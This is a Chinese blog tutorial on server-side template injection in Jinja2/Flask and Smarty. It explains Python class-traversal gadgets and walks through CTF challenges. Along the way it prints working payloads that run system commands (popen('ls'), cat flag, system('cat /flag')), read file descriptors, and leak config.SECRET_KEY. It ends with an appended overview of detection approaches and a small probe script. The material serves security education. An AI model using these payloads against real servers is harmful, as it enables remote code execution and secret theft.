SSTI模板注入总结

本文深入探讨了服务器端模板注入(SSTI)漏洞,包括其概念、引发原因、类型判断、常用Python类的属性与方法,以及在CTF挑战中的应用。通过示例展示了如何利用SSTI执行系统命令,获取敏感信息,并给出了常见的过滤器。同时,文中列举了两道CTF题目,解释了利用技巧,涉及模板引擎如Smarty和Flask。

一、初识SSTI

1、什么是SSTI?

SSTI就是服务器端模板注入(Server-Side Template Injection),实际上也是一种注入漏洞。

可能SSTI对大家而言不是很熟悉,但是相信大家很熟悉SQL注入。实际上这两者的思路都是相同的,因此可以类比来分析。

2、引发SSTI的真正原因

render_template渲染函数的问题

渲染函数在渲染的时候,往往对用户输入的变量不做渲染。

也就是说例如:{{}}在Jinja2中作为变量包裹标识符,Jinja2在渲染的时候会把{{}}包裹的内容当做变量解析替换。比如{{1+1}}会被解析成2。如此一来就可以实现如同sql注入一样的注入漏洞。

二、判断SSTI类型

上面提到网站模板引擎有jinja2、tornado、smarty、twig等等,那么如何判断遇到的是哪种类型?

广为流传的就是这张图了,根据处理返回值的不同来进行判别。(注意括号的数量等)

在这里插入图片描述

三、常用类

先举几个基础的例子方便理解:

1、class

__class__用来查看变量所属的类,格式为变量.__class__

>>> ''.__class__
<class 'str'>
>>> ().__class__
<class 'tuple'>
>>> {}.__class__
<class 'dict'>
>>> [].__class__
<class 'list'>

2、bases

__bases__用来查看类的基类,注意是的基类,所以格式为变量.__class__.__bases__

>>> ''.__class__.__bases__
(<class 'object'>,)
>>> ().__class__.__bases__
(<class 'object'>,)
>>> {}.__class__.__bases__
(<class 'object'>,)
>>> [].__class__.__bases__
(<class 'object'>,)

同时也能加上数组,比如变量.__class__.__bases__[0]来获得第一个基类。

值得一提的是还有个类是__mro__,它会显示类和基类,这是它和__bases__的不同。

>>> ''.__class__.__mro__
(<class 'str'>, <class 'object'>)

3、subclasses()

__subclasses__()查看当前类的子类,格式变量.__class__.__bases__[0].__subclasses__()
这个类也可以加数组来查看指定的索引值,例如变量.__class__.__bases__[0].__subclasses__()[1]
在这里插入图片描述

>>> ''.__class__.__bases__[0].__subclasses__()[0]
<class 'type'>

这个时候就可以开始利用类里面的方法了。

示例:变量.__class__.__bases__[0].__subclasses__()[138].__init__.__globals__,init初始化类,然后globals全局来查找所有的方法及变量及参数。

由此我们可以看到各种各样的参数方法函数,去找一个可利用的function来执行,比如popen的话,就可以这样利用:''.__class__.__bases__[0].__subclasses__()[138].__init__.__globals__['popen']('dir').read()

大概是这么个原理,但这样说来还是不知道怎么利用,来看几道题就能更深刻理解了。

4、类的知识总结(转载)

__class__            类的一个内置属性,表示实例对象的类。
__base__             类型对象的直接基类
__bases__            类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__
__mro__              此属性是由类组成的元组,在方法解析期间会基于它来查找基类。
__subclasses__()     返回这个类的子类集合,Each class keeps a list of weak references to its immediate subclasses. This method returns a list of all those references still alive. The list is in definition order.
__init__             初始化类,返回的类型是function
__globals__          使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
__dic__              类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里
__getattribute__()   实例、类、函数都具有的__getattribute__魔术方法。事实上,在实例化的对象进行.操作的时候(形如:a.xxx/a.xxx()),都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。
__getitem__()        调用字典中的键值,其实就是调用这个魔术方法,比如a['b'],就是a.__getitem__('b')
__builtins__         内建名称空间,内建名称空间有许多名字到对象之间映射,而这些名字其实就是内建函数的名称,对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了,百度都有。
__import__           动态加载类和函数,也就是导入模块,经常用于导入os模块,__import__('os').popen('ls').read()]
__str__()            返回描写这个对象的字符串,可以理解成就是打印出来。
url_for              flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
get_flashed_messages flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
lipsum               flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__['os'].popen('ls').read()}}
current_app          应用上下文,一个全局变量。

request              可以用于获取字符串来绕过,包括下面这些,引用一下羽师傅的。此外,同样可以获取open函数:request.__init__.__globals__['__builtins__'].open('/proc\self\fd/3').read()
request.args.x1   	 get传参
request.values.x1 	 所有参数
request.cookies      cookies参数
request.headers      请求头参数
request.form.x1   	 post传参	(Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)
request.data  		 post传参	(Content-Type:a/b)
request.json		 post传json  (Content-Type: application/json)
config               当前application的所有配置。此外,也可以这样{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
g                    {{g}}得到<flask.g of 'flask_ssti'>

5、常见过滤器(转载)

常用的过滤器

int():将值转换为int类型;

float():将值转换为float类型;

lower():将字符串转换为小写;

upper():将字符串转换为大写;

title():把值中的每个单词的首字母都转成大写;

capitalize():把变量值的首字母转成大写,其余字母转小写;

trim():截取字符串前面和后面的空白字符;

wordcount():计算一个长字符串中单词的个数;

reverse():字符串反转;

replace(value,old,new): 替换将old替换为new的字符串;

truncate(value,length=255,killwords=False):截取length长度的字符串;

striptags():删除字符串中所有的HTML标签,如果出现多个空格,将替换成一个空格;

escape()或e:转义字符,会将<>等符号转义成HTML中的符号。显例:content|escape或content|e。

safe(): 禁用HTML转义,如果开启了全局转义,那么safe过滤器会将变量关掉转义。示例: {{'<em>hello</em>'|safe}}list():将变量列成列表;

string():将变量转换成字符串;

join():将一个序列中的参数值拼接成字符串。示例看上面payload;

abs():返回一个数值的绝对值;

first():返回一个序列的第一个元素;

last():返回一个序列的最后一个元素;

format(value,arags,*kwargs):格式化字符串。比如:{{ "%s" - "%s"|format('Hello?',"Foo!") }}将输出:Helloo? - Foo!

length():返回一个序列或者字典的长度;

sum():返回列表内数值的和;

sort():返回排序后的列表;

default(value,default_value,boolean=false):如果当前变量没有值,则会使用参数中的值来代替。示例:name|default('xiaotuo')----如果name不存在,则会使用xiaotuo来替代。boolean=False默认是在只有这个变量为undefined的时候才会使用default中的值,如果想使用python的形式判断是否为false,则可以传递boolean=true。也可以使用or来替换。

length()返回字符串的长度,别名是count

四、CTF例题

[BJDCTF]The mystery of ip

在这里插入图片描述

进来题目长这样,一看与ip有关,就可以想到可能与X-Forwarded-For或者client-ip有关了,不多说,上bp。
在这里插入图片描述

果然这里的IP是可控的,这道题比较有意思就在于:用{7*7}来判断一下发现这里居然是个SSTI注入。
在这里插入图片描述

尝试一下系统命令:{system('ls')},发现是可以使用的。

在这里插入图片描述

尝试直接{system('cat /flag')}发现是没有waf的
在这里插入图片描述

注:感兴趣的话可以自己去判断下这是什么模板引擎。这道题是Smarty的。

[Bugku]Simple_SSTI_1

进来查看源码,题目是这样的:
在这里插入图片描述

SECRET_KEY是什么?

SECRET_KEY其实就是一个加密盐,用在django和flask的session、cookies等加密中。

所以payload为?flag={{config.SECRET_KEY}}

为什么是config.SECRET_KEY?

因为一般定义SECRET_KEY的config.py的源码是这样的:

class Config(object):
    SECRET_KEY = "EjpNVSNQTyGi1VvWECj9TvC/+kq3oujee2kTfQUs8yCM6xX9Yjq52v54g+HVoknA"

所以当你要引用config的属性时是不是就应该用.来引用啦?

[Bugku]Simple_SSTI_2

进来还是提示要传入?flag=

那就来看一下/?flag={{config}},看到如下内容。
在这里插入图片描述

没什么有用的,既然如此就用ls来查看一下有哪些文件:/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27ls%27).read()}}
在这里插入图片描述

直接cat flag完事:/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20flag%27).read()}}
在这里插入图片描述


参考链接:
https://blog.youkuaiyun.com/weixin_51353029/article/details/111503731
https://blog.youkuaiyun.com/zz_Caleb/article/details/96480967
https://blog.youkuaiyun.com/xiaolong22333/article/details/114228433?spm=1001.2014.3001.5501
https://blog.youkuaiyun.com/rfrder/article/details/113866139

服务器端模板注入SSTI)判断模型的类型主要有以下几种: ### 白盒模型 白盒模型是基于对目标应用程序的内部代码和结构有详细了解的情况下进行判断。通过分析应用程序所使用的模板引擎代码、配置文件等,能够精准地识别出是否存在SSTI漏洞以及使用的具体模板引擎类型。例如,在一个使用Python Flask框架和Jinja2模板引擎的Web应用中,通过查看代码里模板渲染的部分,能明确知道使用的是Jinja2引擎,进而依据Jinja2的语法特性来判断是否存在SSTI漏洞。这种模型的优点是判断准确、针对性强,但缺点是需要获取应用程序的源代码,对于很多实际场景可能无法实现。 ### 黑盒模型 黑盒模型不需要了解目标应用程序的内部代码,主要通过向目标应用发送精心构造的测试Payload,然后根据应用的响应来判断是否存在SSTI漏洞以及可能的模板引擎类型。例如,发送一些通用的测试Payload,如`{{7*7}}` ,如果应用返回`49` ,则很可能存在SSTI漏洞,并且根据不同模板引擎对该Payload的处理方式和响应特征,进一步推测使用的模板引擎类型。常见的可通过这种方式判断的模板引擎有Jinja2、Twig、Velocity等。黑盒模型的优点是不需要源代码,适用性广,但缺点是判断结果可能存在一定的误差,因为不同模板引擎可能有相似的响应特征。 ### 灰盒模型 灰盒模型结合了白盒模型和黑盒模型的特点。在拥有部分应用程序信息(如知道使用的编程语言、框架等,但没有完整源代码)的基础上,再使用黑盒测试的方法进行漏洞判断和模板引擎类型识别。例如,已知目标应用是使用Java语言开发的Spring Boot应用,推测可能使用Thymeleaf模板引擎,然后使用针对Thymeleaf的Payload进行测试,结合应用的响应来进一步确定是否存在SSTI漏洞以及是否是Thymeleaf引擎。这种模型在一定程度上弥补了白盒和黑盒模型的不足,提高了判断的准确性和效率。 ### 机器学习模型 利用机器学习算法对大量的SSTI相关数据进行训练,构建判断模型。这些数据包括正常请求和响应、存在SSTI漏洞的请求和响应以及不同模板引擎的特征数据等。常见的机器学习算法如决策树、支持向量机、神经网络等都可以用于构建模型。在实际应用中,将新的请求和响应数据输入到训练好的模型中,模型会根据学习到的特征进行判断,输出是否存在SSTI漏洞以及可能的模板引擎类型。机器学习模型的优点是能够处理复杂的数据和模式,随着训练数据的增加和模型的优化,判断的准确性会不断提高,但缺点是需要大量的高质量数据进行训练,并且模型的训练和维护成本较高。 ```python # 以下是一个简单的模拟黑盒测试的Python示例,用于测试SSTI漏洞 import requests url = "http://example.com" # 替换为目标URL payload = "{{7*7}}" data = {"input": payload} # 假设应用通过POST请求接收输入 response = requests.post(url, data=data) if "49" in response.text: print("可能存在SSTI漏洞") else: print("未检测到明显的SSTI漏洞") ```
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值